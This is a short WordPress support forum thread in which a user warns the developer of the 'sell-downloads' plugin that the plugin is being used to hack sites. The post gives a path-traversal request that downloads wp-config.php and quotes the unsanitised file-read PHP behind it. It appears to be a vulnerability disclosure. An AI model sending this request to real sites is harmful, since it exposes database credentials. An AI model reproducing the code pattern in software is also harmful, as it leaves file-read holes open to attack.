Plugin & sites?
-
Good job!
Do you know, your plugin is used in site hacking?
They use this address:
/wp-content/plugins/sell-downloads/sell-downloads.php?file=../../../wp-config.php
This is about 131-136 lines of sell-downloads.php V 1.0.17, I think:
`$f_url = $_REQUEST[‘file’];
$f_content = @file_get_contents($f_url);
if($f_content !== false){
$f_name = substr($f_url, strrpos($f_url, ‘/’)+1);
header(‘Content-Disposition: attachment; filename=”‘.$f_name.'”‘);
print $f_content;
}`And I am very glad!… Because i don’t use plugin.
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
- The topic ‘Plugin & sites?’ is closed to new replies.